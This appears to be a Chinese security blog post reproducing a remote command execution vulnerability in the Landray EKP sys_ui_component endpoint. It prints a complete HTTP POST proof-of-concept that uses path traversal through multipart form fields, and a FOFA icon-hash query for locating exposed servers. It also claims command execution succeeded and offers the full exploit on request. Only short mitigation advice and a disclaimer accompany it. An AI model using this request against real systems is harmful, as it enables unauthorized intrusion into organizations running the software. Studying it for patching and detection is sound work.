2024HW 蓝凌 ekp sys_ui_component 远程命令执行漏洞复现

当前位置：点晴教程→知识管理交流 →『技术文档交流』

admin

2024年8月22日 18:56 本文热度 163

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01漏洞描述

蓝凌 EKP sys_ui_component 远程命令执行漏洞,攻击者可通过此漏洞上传恶意脚本文件，对服务器的正常运行造成安全威胁。

0x02漏洞复现

POC如下所示：POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1Host:xx.xx.xx.xxAccept:application/json,text/javascript,*/*;q=0.01Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Connection:closeContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequestContent-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51--

exp：

后台回复："蓝凌exp" 获取

0x03 复现过程

fofa：icon_hash="831854882"

页面是这个样子的：

使用poc：

执行命令dir：

0x04?修复建议

1、请联系厂商进行修复。2、如非必要，禁止公网访问该系统。3、设置白名单访问。

END

该文章在 2024/8/24 12:22:52 编辑过

关键字查询

com

远程

执行

正在查询...

点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。

点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理，结合码头的业务特点，围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体，是物流码头及其他港口类企业的高效ERP管理信息系统。

点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。

点晴免费OA是一款软件和通用服务都免费，不限功能、不限时间、不限用户的免费OA协同办公管理系统。